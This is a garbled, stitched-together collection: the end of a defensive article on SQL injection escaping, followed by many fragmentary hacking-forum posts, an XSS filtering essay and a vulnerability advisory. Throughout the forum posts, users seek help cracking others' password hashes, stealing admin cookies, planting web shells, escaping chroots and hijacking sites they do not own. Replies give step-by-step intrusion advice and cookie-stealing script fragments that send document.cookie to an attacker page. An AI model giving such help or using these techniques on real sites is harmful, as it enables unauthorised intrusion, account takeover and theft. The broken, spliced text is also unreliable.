meaning that the index helped mysql narrow the search to only one row without having to go through all rows in our table test result id select typetable type possible keys key key len refrows extra simple sql injection test all using where test is drastically different though no index was used and all rows of the table have to be checked against the wildcard the reason for that is that a leading wildcard character makes our prefix index useless since the string we search for may begin with any character this happened because we successfully injected a which has a special meaning in the context of the like operator and so is not a subject to mysql real escape string escaping it may not seem an issue for our rows of data but imagine a database of thousands or millions of rows which suddenly cannot use an index but has to go through all that data depending on how the script is written even a single user may be able to carry out a dos attack example d search fixed php search isset get s get s if search search mysql real escape string search search addcslashes search runquery explain select userid username from sql injection test where username like search tests s wi s wi s wi the solution demonstrated in example d is to make a second escaping pass after mysql real escape string for all variables that are replaced within the like operator now tests and behave correctly the addcslashes function is handy because it places a backslash before the given characters and the backslash happens to be the default escape characters for the expression on the right side of the like operator note that mysql allows the choosing of another escape character where username like escape will match a literal but if you do so you cannot use the addcslashes function anymore you will need a replacement function in the said replacement function you would also need to escape the new like escape character or it could be used for a wildcard injection though not in the beginning of the string so the dos impact would not be as big test demonstrates that in our case we don t need to escape the like escape character as mysql real escape string already escaped it when dealing with regular expressions regexp rlike operator the escaping method cannot be as simple as addcslashes so a programmer who wants to use this operator should be doubly careful how she handles user input other databases and other issuesthere are features of non mysql databases which can also be used when injecting sql which can be solved by following the same checklist just replace mysql real escape string with the proper database specific escaping functions the postgresql extension for example has pg escape string and if there is no similar function for your database system you should check its documentation on how to do proper escaping mssql postgresql and maybe other databases including mysql with the mysqli extension support issuing of multiple queries in one call since the syntactic character used for statement terminator the semicolon is not escaped by the standard escaping functions unquoted parameters in the sql query can be used to terminate the current statement and issue another of course if all parameters are properly quoted and type forced the semicolon will either be stripped or be a part of a value literal thus not breaking the query mssql also has a reserved word top used in a similar way as mysql s limit whereas postgresql has limit offset the considerations of section of this article should be applied when using those a summary in plaintextas we saw mysql real escape string is a necessary but not sufficient measure here are the checklist rules one must follow to make sure the dynamic sql code is not vulnerable to sql injection write properly quoted sql single quotes around values string literals and numbers backtick quotes around identifiers databases tables columns aliases properly escape the strings and numbers mysql real escape string for all values string literals and numbers intval for all number values and the numeric parameters of limit escape wildcard regexp metacharacters addcslashes for like and you better avoid regexp rlike if identifiers columns tables or databases or keywords such as asc and desc are referenced in the script parameters make sure and force their values are chosen only as one of an explicit set of options no matter what validation steps you take when processing the user input in your scripts always do the escaping steps before issuing the query validation is not a substitute for escaping hint did you notice how the fixed versions were pedantic in their use of backticks the author is personally convinced that it increases the readability of the queries by making a clearer distinction between identifiers and values it also helps in situations where a novice programmer tries to use a keyword for an identifier shortening description to desc being the most common case since source code is read more times than it is written readability is directly correlated to security pedantic quoting thus has a twofold bonus when writing secure code aboutalexander mordred andonov is an independent security researcher and consultant his security interests lie in developing methodologies for secure web programming and studying how real world applications deal or fail to deal with security problems he can be reached at sir point mordred on gmail references sql injection are your web applications vulnerable by kevin spett advanced sql injection in sql server applications by chris anley blind sql injection are your web applications vulnerable by kevin spett blind sql injection in mysql databases by zeelock sql injection cheat sheet by ferruh mavituna sql injection cheat sheet by david kierznowski php manual sql injection security corner sql injection by chris shiflett php manual mysql real escape string addslashes versus mysql real escape string by chris shiflett mysql reference manual identifiers mysql reference manual string comparison functions like mysql reference manual regular expressions regexp rlike php security guide by chris shiflett sql injection attacks by prof jim whitehead guide to php security chapter sql injection by ilia alshanetsky owasp avoiding sql injection php manual mysql real escape string web archive copy from dec mysql reference manual control flow functions if current copy of this document can be here on the web application security consortium s article guidelines can be found here copy of the license for this document can be found here.
hi new to this managed to get a copy of the database of a site which runs on phpbb x these guys were users on my forum and then started a new forum behind my back with just an er appended to the name they then proceeded to email all my users having coerssed one of the site admins to give them a copy of my database and told them my site was closed and their site was the new home as you can see i am not particulaly pleased and want to regain control i have a copy of their database is it possible to find out what their passwords are because they are encrypted in the sql dump that i have all help much appreciated.
install exact version of php nuke on local server and test.
please give more details what is file name and post some sample fragment from file.
waraxe yes i made a username with admin rights the current username is freak snoop i know how to net send but am unsure how to do it to a single comouter iv done it b to all computers but want to know how to send it to a certain computer.
thanks now we have to find a way that the admins can see that and pull their cookies off it i tried this but too long to fit into subject boxdocument write img src document cookie.
to get this exploit workin.
in general i am against any dos attack and think that it is lame to use them only normal reason to use dos is if you are trying some clever hack attack and you need to knock out one or more of the machines for some time.
when they k lined you they seem to use an irc daemon actually this means you could be able to connect to the server via an irc client using an socks proxy.
you obviously can t read anything lower than the public web directory try find some config file config php but that won t even work becuase it will parse the php file.
thank you for your answerbut would you please send me a link because i can t find itthx and greez darkf rc.
y with the information schema i got all the table names for that db more questions i there a way to modify insert data to a table and can you give me a bit more help for load file and into outfile tnx for help edit load file works got the data of etc passwd but can it be more usefull maybe uploading a shell or something also into outfile doesn t work magic quotes problem.
argentino that s my improvement it works just try it with this one you see the full hash and username of the admin trick is in the qu variable you ll see everything in the for.
hello the version installed on the server is debian ubuntu logi can get table name wit.
hi i need help for this bug sql injin admin login ph.
yes i could but i m not very good at scripting i was wondering if anyone had one otherwise i guess i ll have to hit the book.
sorry to butt in but i ve got a md that i ve not been able to crack it may not even be in english can you please help me with it here it is.
is it exploitable.
dude go and search exploits about this versionof wp in milw rm com or securityfocus com if you found working exploit so you re lucky if not you should get access on the server try other sites on the server and mybe you got shell then mybe it s possible to hack other sites onthe server also you can scan the server with nmap mybe you got some vulnerabilit.
phpbb is very secure software and i don t think that anynone will findany serious sql injections there anymore i mean x versions and as you can see i too use phpbb and it s not been defaced ye.
i guess that it s not dos but some newer windows box with command prompt what operating system what kind of lan if present.
wget dosen t work i can see all find i want on the system execute a lot of thing but can t write anything and can t get out of the home blogdb am i in a jail chrooted so how can i get more rights and get out of the jail.
ok how could i fill the php please tell me step by step if possible i have no idea about this exploi.
thank you once again for your repl.
thanks dude your da ma.
h.
reading exploit is good think.
thank.
i did have to errores but minors because they forgat to put backslashes.
how can i search the bug or create the sql statement in put in to the site database.
hey guys i m trying to find an easy way of obtaining a member s ip address on ipb without having to get admin access and use the ip tool i m sure there is a way around it i just don t want to go through the hassle of cracking the hash of an admin on every site i go to i just want the ip address of a member to check some stuff out if you guys could help me out it would be greatly appreciate.
well there could always be proxy not saying he s doing tha.
tody i have good web shell for iis windows work with asp webthis tool you can get cmd prompt and you can make mass deface and intheralso there is version englishthis tool you can upload with web folder or upload asp in site or if you local host in servername of this tool rhtools code by asp only for windows rhtools asp for download inter this site and get any version you likeand sorry for bad english and have good time for allsite good by.
hi i have no idea what is md i would like to know where can i read about md and try it for my self is there any tutorial and regarding perl does any one have the entire tutorials and one last questions for being an hackers what are the important stuffs that we require or what do we need to know please help regardssudee.
this exploit only works on final and below str k.
thanks my friend i really appreciate ur answer see this demo site.
woah mi unversity professor dont know who is an a hash just say that you wanna to crack that md and thats all and i thinkthis is better to post on the hashing cracking service whatever i will try with you r hashes and put and a answer regard.
and whene i try thi.
this is not rfi you can read files but no inclusion here so you have to take maximum from remote file disclosure try to read config files mysql data files etc also look the source of all other php scripts and search for additional security.
this hash is chars long seems like des hash look at here see good tutorial about exlpoiting frontpage extensions citate from that article.
you don t have file privilege so it s impossible to use into outfil.
ok tested this on my local server and exploiting was kinda complicated still there is working exploit.
what you have here is called remote file disclosure you can reveal the contents of all files on target server if current uid gid and file dir permissions will let you read the file if target file resides on same logical disk if php safe mode open basedir does not interfereso your mission is to escalate your privileges by the way what is your ultimate goal to mess with specific website on hosting server or you want server itself in first case you can try to find configuration files usernames and password hashes for database and orweb applications this may give you a way to get administrator rightsfor web app and next goal can be php shell one more thing scan target server for open tcp ports and look forport mysql this may be handy later and as you can reveal source code of php scripts then searchfor more useful security remote command execution etc.
thanx heintz well i know some how that the file that contains the sql inject is authorize phpwhat i m tryin to do now is to inject but can i ask a question when we use the authorize php i mean in normal not injecting and thanx again zill.
if mysql version is with subqueries support then you can use blind injection in update delete insert and other queries.
a rooting paper would be usefull for me too probably php is configured to not allow remote file inclusion through http or other net protocols it s very very common nowadays like lenny said such vulns come from code like this include my path get page php in such situations you could exploit this to load files that are out of the htdocs folder of the webserver and you can load file with other extensions beside php that is automatically added by the code adding a null byte to you request like so only an example also probably you need to urlencode slashes please note the use of to traverse file system backward yes better if you know the victim os so you can easily locate files on the file system just play with paths and directory traversal looking for known file locations like etc passwd on linux systems when you have such information you can start harvesting other usefull information from other files and maybe if the server is running as root opening etc shadow fil.
that already i have fact the problem is that it does not work to me th.
it s also not only important to just keep your wordpress up to date but every script and application that s running on the server it might be possible that for example he managed to get in through an old forum script or an ftp server bug and that s how he was able to create that folder.
same result here.
more.
first of all there is cross site cross domain security checks in webbrowsers if victim is visiting your website then in normal conditions you can t have victim s cookies for other sites like hotmail com or waraxe us so that s why xss aka cross site scripting comes handy if you have found xss security bug in target website then cookie stealing can be possible practical example target website is phpnuke based session management is cookie based and cookie contains username and password s md hash by stealing cookie attacker can impersonate victim even without hash cracking now this cookie will be created after logging in and destroyed after logging out cookie exists therefore within victim s current activity period or if victim is lazy and will not log out then cookie can remain usable for long time next let s suppose that you trick victim to visit your website example forum post with link to some picture web page victim is visiting contains iframe or multiple recursive iframes and or javascript trick to cover attack this internal iframe in attacker s website is pointed to target s website with xss exploit attached to url stolen cookie can be written to log file or sent by email etc.
if i typ.
could you give more info like whats the filename and in what directory did you find it.
have a look in the htaccess file there should be a line like this.
mostly you will have to re enable xp cmdshell on mssql and sometime even in mssql anyways this is not easily done by hand or at least it is quite tedious i think you should read sql ninja s source code to understand how it is done.
xss can be used very successfully in phishing attacks esp with the new urlbar hiding in iem woo.
hey everybodyi have a question what type of encryption is mysql i thought there was a version where they switched their encryption thanks for all answershanna.
cool nice tool thank.
you need configure phpshell in default not work you need make full path what kernel and year is you victim or send me pvt i redirect for one good irc channe.
many sites allow you to use html tags viz in guestbooks feedbacks topsites etc this can easily be exploited to redirect the entire webpage to whatever site page you want proof of concept sign up for a topsites where you are allowed to use html tags in site description use the followeing tag to redirect the entire page to your site solution disable html tag.
man i read a lot of tutorials and tried to search how to use this exploit i even read how to use exploits here on waraxe but i still can t figure out what i edited wrong and because of this i am asking but ok you can close this thread.
thankyou very much madma.
good findings i have seen hundreds of websites with sql injection holes wind ws nix mysql m sql postgresql oracle all the platforms are presented but anyway most easy is to find sql injection in jsp cfm and asp scripts because there is no magic quotes many webisites will try to hide sql injections and other holes in their p r coded scripts and you see http errors or just redirects to index page and even in those cases big part of protected sites are affected by blind sql injection sploits have done and successfull.
if you want to learn then stop using other peoples exploits lol.
to click or not to click what about the first three links.
php test php but it only shows the text.
yeah i have access to ftp and cpanel but could you maybe explain all this a little better which scripts would i upload and where and what s downloading files from target webroot is it downloading ftp files and this part then download config file get mysql credentials write simple mysql dumping script and fetch user table with all the pasword hashes and salts makes no sense to me sorry you wouldn t happen to have links to anything that might explain these things better.
thank you and what is the cmd to see the computer your on name ip and is there a way to shut down computers on the network also net send boxnamehere hello what does that do exacly.
thx a lo.
nothing i will give up perhaps look for another exploit thanks anyway waraxe.
i would like first to thank for the care dedication and great help for all guys i have an injection problem i think it is easy to solve i have found the number of columns order by s doing but doing union all select or union select shows the common error each union query must have the same number of columns with lots of as t left join si understand that exists within subqueries but i do not know how to validate subqueries there is any clue to validate thanks best regard.
above has more information i have tried many things on my server to prevent this particular attack but the only thing that seems to work is to be in ssh at the time of the attack to ban the ip any ideas on a solution to prevent this all of the solutions in that article were used beforehand i have a copy program if anyone is interested in testing it out.
no this is perfectly safe and secure code.
i search the internet and i found a xss in vbulletin there is a bug in private phpi try this code javascript alert document cookie and i see my cookie informations now how can i use this codes to take admin s cookie informations if someone can give me answer i will be very pleased thankz a lo.
alright i guess im gonna come back to this mysql error i think i probably cant do anything with it but waraxe said to post the error first of all this is php quick arcade and is open source if anyone wants to look at it a regular url request looks like thi.
it might be helpful to know which version of dos you are using and what your plans are do you want to hack somebody from one dos machine to another or what exactl.
school sucks correct me if im wrong if anyone has any cool destructive things using ms dos please share i know some basics but am eager to learn more.
i ve been using post request.
np m anytime if u want help juz pm m.
hii m still new in the world of hacking and try to learn more about it i just want to ask is it possible to hack this blog.
i try to finish my tutorial about nuke cookie manual construct today and then i will post it in phpnuke section and i really hope that you are on about testing your own website not someone else s because this tutorial will be written for good reasons so that any phpnuke webmaster can test it and see how easy it is to use gathered md hash even without cracking them.
hello waraxe forums have a few quick questions i have searched you site extensively and also searched googlei have used the exploit and received my cookie datathe data is herea s autologinid s f d da f s userid s f d da f this should be where my hash is located but its not valid because of the period in the middleis there anything i can do thank.
perhaps its better for me to say my problem in another wayi just wanna stop the firewall i told this problem to my friend in ghs greek hackers sabotage and he just said try to stop the firewall same my thought tnx zipper ur help maybe youre rightbut i think etc passwd cant help me because it s shadow and i couldnt understand some parts of your answer because of my poor english im thinkin other problems can be solvedremember how can i stop this damned fire fucker wall thanks in advance and tnx to zipper his answe.
thats the problem i dont have the rights to create a file as mysql user so select your php code into outfile path of yoursite file php doesnt work smaybe another idea.
hi i like your dirty codes but i have some problem with some thats.
i see four possible problems here you probably don t have file prviliges to use mysql file related functionality you can t use relative path instead use full path mysql daemon must have write privileges to target directory file must not exist allready because into outfile will not overwrite any filesso your best shot is to try load file for example load file etc passwd if this works then you have file privileges if not then no way to use mysql file related functions in current user context p s pexli you was faste.
i have found easy way to get logged in with username and password hash and that s without any cookie crafting just issue the request.
try something like system pwd to print the working directory.
still doesn t work that means i am doing something wrong i put the exploit in the php folder and successfully ran it but it only list the codes in cmd as if i pasted the text from notepad into cmd i am really new to these things but i wanna learn them can somebody please see what i edited wrong the original.
i am sorry if its in the wrong subforumwith every exploit i downloaded i had the same problem.
hi every body thanx for the nice forums i like it any way i want every body to take a look at this well its sql inject i m studying it this days and i kinda wana help in thishow to execute this security hole and another important thing is how to fix it thats all folk.
hi guys can any one know how to exploit jet database error in mssql injection like this error microsoft jet database engine error e wait u guy.
one more thing so called google hack lets try this we get lots of interesting stuff lets look at rd position.
try some tests.
you seem to have sql related coding bug in insert queryso if it s sql injection then probably you need blind injection exploitation but specific sql error message is rather confusing.
posted.
compromise oohh its the same only running on windows xp and jp google command are same its doesnt affect at all.
how can i use this exploit i don t know showul i need a perl software for this please tell m.
hello i want to know how upload shell in admin panel php nukeadmin php.
i agree with gibbocool you need to look for other ways into the target system as always my suggestion is searching for possible co located websites on same server if you can find exploitable vulnerability in one of them then further attack escalation towards main target may be possible.
it seems that you have mysql version x with information schema and you can exploit this via error based feedback but you can fetch data only bit by bit asking boolean questions so you definitely need some sort of script or program which can automate the process doing this manually is too time consuming and error prone first you can use information schema tables for finding out interesting tables and then information schema columns can get you column names then look for credentials table and try to fetch usernames and password hashes or plaintext passwords.
its a blind i have try to use the attack injection but it doesn t realy working for me i need you waraxe or someone other can help me about this it make me crazy its right but i have a problem.
broadcast to all.
you need to know ipb version and target user userid if user has userid and ipb version is.
perl well you need lot s of reading best option is to buy real books but there is also countless amount of freely downloadable information in web for example by my opinion you don t need absolute knowledge of md hashing algorithm leave this to cryptologists but you need some knowledge of basic cryoptography not only hashes but also various encryption methods digital signatures certificates pki and other stuff hacking you must decide your position blackhat or whitehat either way success comes through knowledge and experienece endless process of self education and practice so you need lot s of free time and patience because beginning is the hardest part.
hey all xd need to know a solution for this fucking bug it s not a lfi bugit s just a rfd remote file disclosure vulnerability for some uploaded pics hep brothers if anyone can to do something simple for this injection through php it break my head xd i tried somes things simple like local remote file command inclusion and also somes codes php but nothing at allit works not well therefore tried may be you can do something and a small bug blind sql.
to get start use localhost for testing install wampserver mysqlphpapatch install script that you want to exploit now you can start to pla.
ok the problem was that sending direct of xss site to someones mail is not working but sending simple redirect page is working like a charm.
the technical details i brief introductionii common techniques of code conclusionv glossaryvi referencesi brief article attempts to explain the anatomy of cross site scripting holes while xss may show up in many places in a web application i will only focuson one subset of the xss issue malicious code injection injection generally the same concepts are also applicable to other scripting languages like vbscript jscript and so on the readers are assumed to have some knowledge of cross site scripting bugs a little knowledge of html css and javascript is helpful in issue i feel that xss issue is often overlooked or not correctly taken care of this seemingly trivial hole is a far more complex problem to solve than whati had imagined it to be it is my intention to tell you how the typicalxss holes manifest themselves hopefully you will be able to defend yourselfbuild better web application or at the very least to evaluate your risk better ii common techniques of code injectionmany web applications today are rather interactive very often many parts of the web site are under our manipulation for example a forum a web and so on in these applications users can post messages and most of the time users are allowed to post message with html tags for formatting now allthese nice features opens up oppoturnities for the attackers to inject malicious code into the web sites if the web applications were poorly written as far as i know these are several categories of code injection techniques if you know of any techniques not listed here please tell me script tags alert xss variations cscript ealert xss c script e alert xss and so on inline code javascript pseudo protocol variations and so on event handler variations expression evaluation in css notes to work on most browsers but and work on ie browsers only as you can see by now it is not quite viable to list every possible variations of likewise it is also not very viable to filter javascript in html tags by hardcodedrules at the categories of techniques let us go through them one at a time and see what can be done to stop such attack as i am not a professional programmer countermeasure that i put forward here are solely for reference only script tags this is the easiest to tackle a simple translation rule that translates to to will do the job pretty well inline code javascript pseudo protocol again this is also relatively easy to filter a proposed countermeasure will be search for pattern javascript and its variations like javascript replace the pattern found with other harmless string or just simply delete it event handler things are getting tougher for the programmers now for every html tags that are allowedin the message we have to search for all possible event handlers and defang them for instance search for string onmouseover and replace with or other harmless string the cascading style sheet way this one is really a pain in the ass i would suggest you to look at the css a complete picture of the problem anyway a suggestion not tested though will be be really paranoid and disallow css in tags totally this means that we have to search for style s and defang them or we may also try search for pattern javascript and its variations like javascript and replace them with harmless string expression evaluation in css here comes finally an ultimate test for the programmers maybe the safest way to deal with this one is to disallow css completely by filtering style by now we should realise that our defense against xss problem is a very clumsy one as there are just too many items to check for in our list many programmers often overlook some of them of type and iv conclusionat the time of writing i am not aware of any one size fit all solution that will painlessly eradicatexss problems and i believe such solution may not materialise at all in the near future thankfullywe have yet to see mass exploitation of xss holes in the wild that causes significant financial loss but before it happens to us we have to be extra cautious when building web applications v site style sheetvi references.
if you are root and can only use select statements you re done us.
i m looking a.
it means that there is no valid mysql user with permitted access from your ip address mysql is flexible and ip restrictions can be based user database and even on table so probably you can t access that mysql server directly from remote ip address try to find phpmyadmin interface it should help.
hey i have recently been banned from a chat they k lined me i want to go back using a proxy i have this website and i use it but it does not work for flash or java so the chat wont run does anyone know of a java or flash proxy thank.
waraxe plexi shai tan autant de pseudo qui disent long sur le comportement shai tan est fier de l tre et il le sait surtout quand je lui ai expliqu ce que veut dire son pseudo d ailleurs on sait qu il y a des gens qui peuvent se rallier avec shaitan pour arriver leurs fins chez d autres gens a s appelle la takiya.
because the exploit is broken and doesnt work.
dont forget that you dont need to put any real javascript on the website you can use remote scripts by using the src attribute in many different methods also javascript is not the only language you can use for xss here is example of javascript that can steal a cookie without using any quotes also is the technique in that paper this is tested with mozilla var u x u source document cookiewindow location.
xssed comthats like a zone h of xss always good to learn from attacks.
that doesnt work seeing as ibf is the default and you dont have to put that just look at the code there is somthing wrong tho and i cant figure it out wish i could tho.
i think the problem is somewhere in the  cookie location i put it like thisdocument location the file is immediatelly created but without cookie in i.
for run pl you need in windows install linux you not need install perl only exec perl file plmore info.
or use hex encoded strings xaabbcc because php magic quotes feature can change to.
hello waraxe members well ok i want to hack this site because its a site that you only can register with an invite and its on invision board but i went to your invision board section to see the hacks programs but i seen some posts about sql injections and a long code and my face just droped lol ok so what do i do or could you give me a link to where are tutorials that could help me to hack the site nice to talk to you thanks.
wait a minute seems that i was getting wrong picture you mean that script writes to log file something as.
should i need upload this php file if need where i upload it please show some link where i can upload this php file how can i upload it.
haha ur right just got my hands on the source code.
very loli love it l.
you can make additional table phpbb plaintext and add lines new code which will in case of new user registration insert md to old table and plaintext password to new table better yet in phpmyadmin just copy the old users table structure only and then use original sql clause form source code with little modification password instead md.
ok seems that you can use error based feedback some more tests.
nope the result its still the same maybe this is some kind of http response splitting or.
thanks for you reply tehhunter pro.
use a xss shell put script source from admin panel if you have it.
for test this bug you use google allinurl zboard zboard phpvulnerable file write php include dir write php real life exploit shell xd apwdidis very easy remember zeroboard in kore.
i saw it on directory vti pvt having a filename of service pwd.
hello i would like to know the following or at least would like to be pointed at the right direction i d like to get the cookies as shown on the following example example i write an address of my site this site will have the needed php or some other script victim will click on this link and his cookie will be stolen victim will be redirected to the real site i will be able to see the victims cookie information from the page he clicked to get to my page i would like to see the cookie information from an log txt fileheres a better example the victim sees a address on victimsite com and clicks on it he will go to mypage com and his victimsite com cookie will be stolen he will be redirected to realsite com hope you get i.
here it is as promised you the bes.
tu crois que c est le scoop du siecle de d couvrire que badrh higgs b s n badro u une simple recherche sur google te donne a et laisse moi te dire quelquechose j avais m me fait une b tise en laissant trainer mon vrai nom sur le net avant que je commence a hacker si tu es si fort que a donne le moi p et personne ne s est donn la peine de le v rifier quant au site ibndz c tait une b tise de d butant de ma part et j ai tant bien que mal ssayer de la r parer mais t inquittes je sais beaucoup plus de choses pr sent amicalemen.
great thank you youre really good edit can mime detection be fooled somehow.
maybe this working but years ago.
thanks waraxe i will give it a try.
as for missing feedback use blind injection with benchmark or sleep and database schema can be guessed or in case of mysql ver x there is information schem.
okey and is it possible to exploit such an error.
do you tried the phpbb exploit with highlight issue you can execute commands modify database and even include files look at phpbb forum and take a look at vulns in phpbb the exploit are down i m going to upload the exploit again as soon as possiblesee y.
first of all this is privilege escalation exploit from source.
help me decode php file pleas.
it s sql injection basics internet is full of related tutorials and manuals some useful links.
hi i use a wordpress expolit and give me a this code c a afc f be ca e ee tanks for crackhave god timetank.
why test this script local if works a of all ipb there i tested.
why you need to hack that blog have you something against israel ok i understand that you live in malaysia and you are muslim so you must hate israel right have you realized that using toos like wordpressbf is a wasting of time in this case most propably it is they don t use weak passwords trust me last but not least please remove that url now.
hii just registered an domain systemsolution bizi want to learn to deface or in this case want to upload an index page to it but off course not with the proper authentication pattern want to learn to hack any can guide me or direct me to similar hacking techniques or if anyone can upload an index page to it and show me a video on how you did it.
ok i went to backtrack and coded this goodbye c include int main printf goodbye cruel world n return but when i try to compile it says warning no newline at end of file any help.
you logged in as the user not the adminadmin would have this in his or her cooki.
you enter the private message and sent a private message someone and enter the code to subject and the preview messag.
hello all i have a big trouble with severs that have the safe mode turned on and by g gle i found this forum and a jornal for this member linux issuing a php shell that bypass the safe mode but the download link is dead so can he himself fix it or anybody here has that shell already post it here plz cheer.
i think sqli is far more difficult you need to know sql not always but in many cases one thing more null byte works because it s the urlencoded version of the cc null byte also known as the string terminator so if the string sequence ismystring isasdphp would see only mystring.
acuneti.
btw the was a surprise cause i really dun know wat to do in the site not for offending or someth sorry leh btw wats bout hehehehehe juz kiddin.
i really don t i never needed to use it as an admin i can t find a user table or user rows could it be named something different i did click on users and find password in a list when i view it i get a two columns one says rows and usually has the number and the other says password and has what i think is a hash stuff like this b e d bcf f d bf b b is this it it doesn t say the usernames or salts though edit nvm i think i found it all what kind of hash would it be it says r but i don t know what to put for type of hash anyway i m gonna have passwordspro run but i guess i ll also ask for someone on here to try thanks for the help.
yeah it s a start more specifically is there a way to intercept log in information without altering files on the actual server this is the latest version of vbulletin if it helps.
one more time forget dos it s windows xp and that black box is command prompt now first thing is your privilege level in local pc have you admin rights can you browse windows directory what s your current username.
jason unless it s been patched which i doubt what i did was when in the admin panel i go to the page where you can edit the css and in the url bar i change where it shows the filename of the css file to a php file and i load that page and in the text box you can edit the source of the php file your making and when you save it it will save to and you can run it from ther.
for those who will find it handy nothing more to say or do example.
lol magic quotes please explain lolcheer.
thank you i searched with complicated keywords but all the time it was so simple thank.
bump i m really such a noob but the aforementioned head admin is being really pissy toda.
is there anyway of bypassing this code is there other way of creating a super admin account with the admin s username and hash im testing my phpnuke portal and just wanna make sure thanks in advanc.
how to use milw rm exploit.
little addition por publica es tipo de m dia m dia folhetos cedap teoria do conhecimento e educa o cedap elei es e o movimento sql server intel x may copyright c microsoft corporation enterprise edition on windows nt build service pack.
most irritating thing is a htaccess protection which you probably mean by pop up script had the same issue a couple of months ago too got the admin passwords of some famous cell phone company here but their admin panel was under construction login page worked though now i can t find the passes anymore.
yep i have backtrack and vmware man do i love backtrac.
my guess would be he got a backup via the validator list then got the admin pass uploaded a shell and got i.
hellonew techniques have been used in this video turkish is the language of video must watch until the end translate google video.
i have played a little bit with that security bug and got some results will share them tomorrow in this thread so stay tune.
this php injection bug is ol.
can anyone post the cmd txt file.
it seems that user credentials are sent to shop login php in clear text this is pointing to the fact that login is done via http not it s useless for you right now upload stuff acunetix detected post form with upload functionality so it will guess that upload may be possible it s up to you to exploit it if possible without seeing source code it s hard to tell why this error messages are popping up try various things and look for error feedbac.
hey brother thanks a lot regarding p p i tried emule but i was not succesful in getting it to work i will try it again btw i got my ubuntu server cd mate.
yesi do but i m not the head admin which i am attempting to becom.
what version secunia has seven security bugs in their list.
really i tried something with numbers is still error reporting swith and.
ok microsoft fixed the bug after a week that was quic.
hi i know nothing i m not interested in getting into hacking well not too much and just want to know if there s any way to delete the head admin s account on this website he s a real jerk and i just want to scare him a bit i m the only other admin so by deleting this guys account i could become head admin it s an invisionfree power board v final sorry i m such a noob.
write script for that in perl php or other language or write shell script it s simple string manipulation by the way i m using special php cli script which takes raw copy pasted text extracts md hashes and then exports them to cain cracker very useful lot easier as copy paste one by on.
howitzeryou have been in kosovo nice i m from pristina if you now where it is it s hard life but it s good you dont need to belive me.
yeah i have done lots of things to prevent syn flooding on my server the only real fix is going to have to come from apache it seems like echo proc sys net ipv tcp syncookies shifts the load more towards the kernel and less towards apache this helps out some below is part of a bash script i also use.
well i just copy pasted to passwordspro what do you mean by insert into user values.
thanks a lot waraxe well regarding hacking as far i go if i have to choose between blackhat or white hat i would go with black hat and as you sy beginning it is very tough so would require all the help with i can getand once again thanks for the link or if you have any place where i can download stuffs do let me knw and i hve lots of time as i sit in front of the computer almost the entire day so cheers mate regardssudee.
nice its very good thnx ma.
why dont u post the hash s salt her.
can anyone elaborate a little on this cos i ve only started to learn php recentl.
bum.
yeah you have reason thank u very much.
how do i execute a perl script on a mac i have terminal and automator i just don t know how to use it since everything online seems to be for windows thanks for any help i can get.
there are tools to get the ip of your domain s host but sometimes they don t work.
hey my buddy owns a site and now some dude on aim messaged him and was saying to pay him for security updates of course he said no because everything is updated and their is no exploits out the only thing he has is the latest word press its on a dedicated host and the guy then created a folder on the server somehow any idea how i cna try to reattempt this or some how figure out how he did it don t really wanna pay grand to this stalker dude lo.
salam alikoum le probl me c est ce que peuvent savoir les autres sur toi et non pas moi moi avec modestie je r pond que je te connais pas la modestie est une khissla rare chez les gens sinon ton nom et le reste je ne veux pas te le donner car sur le net et tu sais pourquoi ou alors je vais te le communiquer d une mani re o tu dois faire bouger un peu tes neuronnes sous forme d un hash et c est toi de jouer le savoir et les astuces sont devenus la propri t de tout le monde comme ils disent el awlama ne sommes pas dans un village o tout le monde connait tout le monde il reste l art de se faire tout petit tout en tant grand sala.
u forget prefix ipb after command line lok at the exampl.
my question is can i access the server that put the nobody on and read the files thaton the server coz it just give me permission denied.
content web lets remote users inject sql commands conduct cross site scripting attacks and include local files alert id url reference generic map nomatch links to external site date sep impact disclosure of authentication information disclosure of system information disclosure of user information execution of arbitrary code via network modification of user included yes version s description linux from sosvulnerable net reported a vulnerability in content web a remote user can execute arbitrary scripting code from the target system a remote user can also inject sql commands and conduct cross site scripting attacks the software does not properly validate user supplied input in the show parameter this can be exploited to execute php code inject sql commands conduct cross site scripting attacks and determine the installation path a remote user can supply a specially crafted url to cause the target system to include and execute arbitrary php code files that reside on the target system the php code including operating system commands will run with the privileges of the target web service a demonstration exploit url is provided note it is not clear if files from a remote location can be included or not a remote user can supply a specially crafted parameter value to execute sql commands on the underlying database a demonstration exploit url is provided remote user can create a specially crafted url that when loaded by a target user will cause arbitrary scripting code to be executed by the target user s browser the code will originate from the site running the content web software and will run in the security context of that site as a result the code will be able to access the target user s cookies including authentication cookies if any associated with the site access data recently submitted by the target user via web form to the site or take actions on the site acting as the target user a demonstration exploit url is provided c script e site impressuma remote user can supply the following type of url to determine the installation path path xd start impact a remote user can execute arbitrary php code and operating system commands from files residing on the target system with the privileges of the target web service a remote user can execute sql commands on the underlying database a remote user can access the target user s cookies including authentication cookies if any associated with the site running the content web software access data recently submitted by the target user via web form to the site or take actions on the site acting as the target user a remote user can determine the installation path solution no solution was available at the time of this entry vendor url content web org links to external site cause input validation error underlying os linux any unix any windows any reported by security tester.
see the thing is i kinda do have privacy concerns the file basically looks like this all the way through cc cc a b cd ea b fa d english d m d y g i a null.
i would like some help also i have tried not only that code but a few each containing a new way to get the pass but i can t seem to make them work i have perl the comands are good i think the codes are similar to this one and i have used this one usually i put ipb pl no luck i remove the space it gives an error at a line i put space it does nothing i would like some help as i am tired of using exploits that i don t know if they work or not.
hibut does not work in my computer when i simuling the case i have all privileges.
i dunno ithis question will be so hard like thatok i though someone here can answer mu question but for the first question i found a good shell and a way to hack safe mode serversbut i still dunno how to hack nobody state servers so anybodyanswer me thn.
you know what is linuxunix commanderror logget methodpost method do as say waraxe install cutenews local and testdon t do this on real server.
first you cant upload c sh to hack into a server because you didnt make the script thierfore your a cracker anyways enough of the ethical mumbo jumbo you can use c sh on many unsecure hosts how to use it is up to you i suggest learning some linux commands and how to get around a linux based webserver to start with because you need to know directory paths file names etc in other words what your looking for in answer to your second question i believe waraxe is working on sqlaxe a site sql penetration tester im not sure what its stages are but im sure if you ask him he dont bite unless you ask him to greets to all the waraxe regs and thats andy for another pos.
thnx waraxe i ll try to bypass admin panel because there s not a forum or a config files in the siteand i have no permissions to read config of other sitesthnx again for your help and take extra car.
thanks waraxeyou have reason it seems to me that it is a classic injection thanks waraxe best regards.
helloi tried different codes and also used the base coder but it doesn t seems to work here s the code if someone can help me pleasethanx in advancegrtzmik.
there are in kosovo programming design s schools for years old teens where teachers asking you to decrypt md hash it s really funn.
